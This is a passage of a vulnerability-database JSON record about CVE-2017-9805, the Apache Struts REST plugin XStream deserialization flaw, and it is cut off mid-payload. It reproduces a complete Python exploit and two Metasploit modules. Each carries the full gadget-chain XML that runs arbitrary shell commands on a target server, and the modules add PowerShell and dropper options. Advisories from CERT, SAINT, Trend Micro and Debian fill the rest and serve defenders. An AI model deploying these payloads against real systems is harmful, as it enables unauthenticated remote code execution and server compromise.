"https://packetstormsecurity.com/files/download/144034/struts2_rest_xstream.rb.txt"}], "zdt": [{"lastseen": "2018-01-04T13:04:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://0day.today/exploit/description/28445", "id": "1337DAY-ID-28445", "title": "Apache Struts 2.5 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE\r\n# Google Dork: filetype:action\r\n# Date: 06/09/2017\r\n# Exploit Author: Warflop\r\n# Vendor Homepage: https://struts.apache.org/\r\n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip\r\n# Version: Struts 2.5 \u2013 Struts 2.5.12\r\n# Tested on: Struts 2.5.10\r\n# CVE : 2017-9805\r\n \r\n#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# Struts CVE-2017-9805 Exploit\r\n# Warflop (http://securityattack.com.br/)\r\n# Greetz: Pimps & G4mbl3r\r\n# *****************************************************\r\nimport requests\r\nimport sys\r\n \r\ndef exploration(command):\r\n \r\n exploit = '''\r\n <map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer/>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n </map>\r\n '''\r\n \r\n \r\n url = sys.argv[1]\r\n \r\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',\r\n 'Content-Type': 'application/xml'}\r\n \r\n request = requests.post(url, data=exploit, headers=headers)\r\n print request.text\r\n \r\nif len(sys.argv) < 3:\r\n print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')\r\n print ('[*] Warflop - http://securityattack.com.br')\r\n print ('[*] Greatz: Pimps & G4mbl3r')\r\n print ('[*] Use: python struts2.py URL COMMAND')\r\n print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')\r\n exit(0)\r\nelse:\r\n exploration(sys.argv[2])\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28445"}, {"lastseen": "2018-04-15T07:48:17", "bulletinFamily": "exploit", "description": "Apache Struts versions 2.5 through 2.5.12 using the REST plugin are vulnerable to a Java deserialization attack in the XStream library.", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://0day.today/exploit/description/28454", "id": "1337DAY-ID-28454", "title": "Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 REST Plugin XStream RCE',\r\n 'Description' => %q{\r\n Apache Struts versions 2.5 through 2.5.12 using the REST plugin are\r\n vulnerable to a Java deserialization attack in the XStream library.\r\n },\r\n 'Author' => [\r\n 'Man Yue Mo', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-9805'],\r\n ['URL', 'https://struts.apache.org/docs/s2-052.html'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],\r\n ['URL', 'https://github.com/mbechler/marshalsec']\r\n ],\r\n 'DisclosureDate' => 'Sep 5 2017',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'python', 'linux', 'win'],\r\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Unix (In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n ],\r\n ['Python (In-Memory)',\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON\r\n ],\r\n ['PowerShell (In-Memory)',\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ],\r\n ['Linux (Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ],\r\n ['Windows (Dropper)',\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'ctype' => 'application/xml',\r\n 'data' => random_crap\r\n )\r\n\r\n if res && res.code == 500 && res.body.include?('xstream')\r\n CheckCode::Appears\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case target.name\r\n when /Unix/, /Python/, /PowerShell/\r\n execute_command(payload.encoded)\r\n else\r\n execute_cmdstager\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n case target.name\r\n when /Unix/, /Linux/\r\n cmd = %W{/bin/sh -c #{cmd}}\r\n when /Python/\r\n cmd = %W{python -c #{cmd}}\r\n when /PowerShell/\r\n # This shit doesn't work yet\r\n require 'pry'; binding.pry\r\n cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}\r\n when /Windows/\r\n cmd = %W{cmd.exe /c #{cmd}}\r\n end\r\n\r\n # Encode each command argument with HTML entities\r\n cmd.map! { |arg| Rex::Text.html_encode(arg) }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'ctype' => 'application/xml',\r\n 'data' => xstream_payload(cmd)\r\n )\r\n end\r\n\r\n # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO\r\n def xstream_payload(cmd)\r\n # XXX: <spillLength> and <read> need to be removed for Windows\r\n <<EOF\r\n<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>#{cmd.join('</string><string>')}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>#{random_crap}</name>\r\n </filter>\r\n <next class=\"string\">#{random_crap}</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>\r\nEOF\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-15] #", "sourceHref": "https://0day.today/exploit/28454", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "description": "Added: 09/08/2017 \nCVE: [CVE-2017-9805](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>) \nBID: [100609](<http://www.securityfocus.com/bid/100609>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe REST plugin in Apache Struts uses `**XStreamHandler**` with an instance of XStream for deserialization without any type filtering, allowing a remote, unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) to Apache Struts 2.3.34 or 2.5.13 or higher. \n\n### References\n\n<https://struts.apache.org/docs/s2-052.html> \n<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html> \n\n\n### Limitations\n\nExploit works on Struts 2.5.10 running on Linux. \n\n### Platforms\n\nWindows \nLinux \nLinux x64 \n \n\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "SAINT:49062325B1FAB54D731E4C8FBF78D940", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_rest_plugin_xstream", "title": "Apache Struts REST plugin XStream deserialization vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 09/08/2017 \nCVE: [CVE-2017-9805](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>) \nBID: [100609](<http://www.securityfocus.com/bid/100609>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe REST plugin in Apache Struts uses `**XStreamHandler**` with an instance of XStream for deserialization without any type filtering, allowing a remote, unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) to Apache Struts 2.3.34 or 2.5.13 or higher. \n\n### References\n\n<https://struts.apache.org/docs/s2-052.html> \n<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html> \n\n\n### Limitations\n\nExploit works on Struts 2.5.10 running on Linux. \n\n### Platforms\n\nWindows \nLinux \nLinux x64 \n \n\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_rest_plugin_xstream", "title": "Apache Struts REST plugin XStream deserialization vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2017-09-08T17:15:49", "bulletinFamily": "blog", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nEarlier this week, a \u2018severe\u2019 vulnerability was discovered in Apache Struts, an open source framework for developing applications in Java. The vulnerability, CVE-2017-9805, affects all versions of Struts since 2008 and all applications using the framework\u2019s REST plugin are vulnerable. Trend Micro has released DVToolkit CSW file CVE-2017-9805.csw for the Apache Struts 2 Vulnerability to customers using TippingPoint solutions. The CSW file includes the following filters:\n\n \n\n**Filter C000001: HTTP: Apache Struts 2 XStreamHandler Command Injection Vulnerability **\n\nThis filter detects an attempt to exploit a command injection vulnerability in Apache Struts 2. The specific flaw exists due to a failure to properly validate requests sent to the REST plugin with the XStream handler. An attacker can leverage this vulnerability to execute code under the context of the application. _Note: This filter will be obsoleted by MainlineDV filter 29580._\n\n**Filter C000002: HTTP: Apache Struts 2 XStreamHandler Suspicious XML Command Usage**\n\nThis filter detects usage of suspicious XML objects. Apache Struts 2 is known to be vulnerable to command injection flaws when the REST plugin is used with the XStream handler. While not inherently malicious the serialized data can be used for command injection. _Note: This filter will be obsoleted by MainlineDV filter 29572._\n\nReferences:\n\n| \n\n * Common Vulnerabilities and Exposures: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>\n * SecurityFocus BugTraq ID: <http://www.securityfocus.com/bid/100609>\n * Vendor Advisory: <http://struts.apache.org/docs/s2-052.html> \n---|--- \n| \n \nCustomers who need the latest DVToolkit filters can visit the Threat Management Center (TMC) website at https://tmc.tippingpoint.com and navigate to Releases \u2192 CSW Files. For questions or technical assistance on any Trend Micro TippingPoint product, customers can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Micro Focus Protect 2017**\n\nTrend Micro is a Gold Sponsor at the upcoming Micro Focus Protect 2017 conference in Washington, D.C. starting Monday, September 11 through Wednesday, September 13. In addition to live product demos, yours truly will also be speaking on Tuesday, September 12 at 1:30pm EDT featuring the topic \u201cPrioritize and Remediate the Threats that Matter the Most.\u201d Satinder Khasriya will also be speaking in the Expo Hall featuring the topic \u201cAchieve Groundbreaking Performance and Security Accuracy with Trend Micro TippingPoint.\u201d For more information on the event, click [here](<https://softwareevents.microfocus.com/protectindex>).\n\n**Zero-Day Filters**\n\nThere are seven new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Advantech (3)_**\n\n| \n\n * 29540: ZDI-CAN-4994: Zero Day Initiative Vulnerability (Advantech WebAccess)\n * 29542: ZDI-CAN-4995: Zero Day Initiative Vulnerability (Advantech WebAccess)\n * 29543: ZDI-CAN-4996: Zero Day Initiative Vulnerability (Advantech WebAccess) \n---|--- \n| \n \n**_Foxit (3)_**\n\n| \n\n * 29523: ZDI-CAN-4979: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29524: ZDI-CAN-4980: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29531: ZDI-CAN-4981: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 29513: HTTP: HPE Intelligent Management Center ictExpertDownload Code Execution Vulnerability (ZDI-17-663) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-august-28-2017/>).", "modified": "2017-09-08T14:23:58", "published": "2017-09-08T14:23:58", "id": "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-september-4-2017/", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of September 4, 2017", "type": "trendmicroblog", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2019-05-30T02:21:19", "bulletinFamily": "unix", "description": "Package : tomcat7\nVersion : 7.0.28-4+deb7u14\nCVE ID : CVE-2017-5664\nDebian Bug : 864447\n\nThe error page mechanism of the Java Servlet Specification requires\nthat, when an error occurs and an error page is configured for the\nerror that occurred, the original request and response are forwarded\nto the error page. This means that the request is presented to the\nerror page with the original HTTP method. If the error page is a\nstatic file, expected behaviour is to serve content of the file as if\nprocessing a GET request, regardless of the actual HTTP method. The\nDefault Servlet in Apache Tomcat did not do this. Depending on the\noriginal request this could lead to unexpected and undesirable results\nfor static error pages including, if the DefaultServlet is configured\nto permit writes, the replacement or removal of the custom error page.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.0.28-4+deb7u14.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-06-20T21:35:33", "published": "2017-06-20T21:35:33", "id": "DEBIAN:DLA-996-1:D223D", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201706/msg00025.html", "title": "[SECURITY] [DLA 996-1] tomcat7 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:59", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3892-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nJune 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat7\nCVE ID : CVE-2017-5664\nDebian Bug : 864447 802312\n\nAniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.0.56-3+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.0.72-3.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 7.0.72-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.0.72-3.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-06-22T08:05:38", "published": "2017-06-22T08:05:38", "id": "DEBIAN:DSA-3892-1:576B2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00152.html", "title": "[SECURITY] [DSA 3892-1] tomcat7 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:31", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3891-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nJune 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat8\nCVE ID : CVE-2017-5664\nDebian Bug : 864447 802312\n\nAniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 8.0.14-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 8.5.14-1+deb9u1.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 8.5.14-2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.5.14-2.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-06-22T08:05:27", "published": "2017-06-22T08:05:27", "id": "DEBIAN:DSA-3891-1:F49C7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00151.html", "title": "[SECURITY] [DSA 3891-1] tomcat8 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Apache Struts REST plugin XStream XML request\n\nVulnerability Type: Remote Command Execution", "modified": "2018-04-20T00:00:00", "published": "2018-04-20T00:00:00", "id": "E-643", "href": "", "type": "dsquare", "title": "Apache Struts REST Plugin XStream RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:49:23", "bulletinFamily": "info", "description": "### Overview \n\nApache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application.\n\n### Description \n\n[**CWE-502**](<https://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data** \\- CVE-2017-9805\n\nIn Apache Struts 2 framework, versions 2.5 to 2.5.12, the REST plugin uses `XStreamHandler` with an instance of XStream to deserialize XML data. Because there is no type filtering, a remote, unauthenticated attacker may send a specially crafted XML payload to execute arbitrary code in the context of the Struts application. \n \nRefer to the researcher's [blog post](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) for more information about this vulnerability. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/8924/files>) with exploit code is publicly available. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may send a specially crafted XML payload to execute arbitrary code on vulnerable servers in the context of the Struts application. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThe vendor has released version 2.5.13 to address this vulnerability. No workaround is possible [according to the vendor](<https://struts.apache.org/docs/s2-052.html>), so patching is strongly recommended. \n \n--- \n \n**Remove or limit the REST plugin** \n \nIf it is not used, consider removing the REST plugin. Per the vendor, it is also possible to limit its functionality to normal server pages or JSON with the following configuration change in `struts.xml`: \n \n`<constant name=\"struts.action.extension\" value=\"xhtml,,json\" />` \n \n--- \n \n### Vendor Information\n\n112992\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apache Struts\n\nUpdated: September 06, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://struts.apache.org/docs/s2-052.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.3 | E:F/RL:OF/RC:C \nEnvironmental | 8.3 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://cwe.mitre.org/data/definitions/502.html>\n * <https://struts.apache.org/docs/s2-052.html>\n * <https://lgtm.com/blog/apache_struts_CVE-2017-9805>\n * <https://github.com/rapid7/metasploit-framework/pull/8924/files>\n\n### Acknowledgements\n\nMan Yue Mo of lgtm is credited with reporting this vulnerability to the vendor.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-9805](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9805>) \n---|--- \n**Date Public:** | 2017-09-05 \n**Date First Published:** | 2017-09-06 \n**Date Last Updated: ** | 2017-09-06 13:16 UTC \n**Document Revision: ** | 13 \n", "modified": "2017-09-06T13:16:00", "published": "2017-09-06T00:00:00", "id": "VU:112992", "href": "https://www.kb.cert.org/vuls/id/112992", "type": "cert", "title": "Apache Struts 2 framework REST plugin insecurely deserializes untrusted XML data", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-02-20T00:41:05", "bulletinFamily": "exploit", "description": "Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library.\n", "modified": "2019-07-10T15:58:03", "published": "2017-09-06T01:12:08", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM", "href": "", "type": "metasploit", "title": "Apache Struts 2 REST Plugin XStream RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 REST Plugin XStream RCE',\n 'Description' => %q{\n Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12,\n using the REST plugin, are vulnerable to a Java deserialization attack\n in the XStream library.\n },\n 'Author' => [\n 'Man Yue Mo', # Vulnerability discovery\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2017-9805'],\n ['URL', 'https://struts.apache.org/docs/s2-052.html'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],\n ['URL', 'https://github.com/mbechler/marshalsec']\n ],\n 'DisclosureDate' => '2017-09-05',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'python', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix (In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Windows (In-Memory)',\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_memory\n ],\n ['Python (In-Memory)',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :py_memory\n ],\n ['PowerShell (In-Memory)',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_memory\n ],\n ['Linux (Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n ['Windows (Dropper)',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3'])\n ])\n end\n\n def check\n return CheckCode::Appears if execute_command(rand_str)\n\n CheckCode::Safe\n end\n\n def exploit\n case target['Type']\n when /memory/\n execute_command(payload.encoded)\n when /dropper/\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, opts = {})\n cmd =\n case target['Type']\n when :unix_memory, :linux_dropper\n %W{/bin/sh -c #{cmd}}\n when :py_memory\n %W{python -c #{cmd}}\n when :psh_memory\n if payload\n cmd_psh_payload(\n cmd,\n payload.arch.first,\n remove_comspec: true,\n encode_final_payload: true\n ).split\n else\n %W{powershell.exe -c #{cmd}}\n end\n when :win_memory, :win_dropper\n %W{cmd.exe /c #{cmd}}\n end\n\n # Encode each command argument with XML entities\n cmd.map! { |arg| arg.encode(xml: :text) }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'application/xml',\n 'data' => xstream_payload(cmd)\n )\n\n return false unless check_response(res)\n\n true\n end\n\n # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO\n def xstream_payload(cmd)\n # XXX: <spillLength> and <read> need to be removed for Windows\n <<EOF\n<map>\n <entry>\n 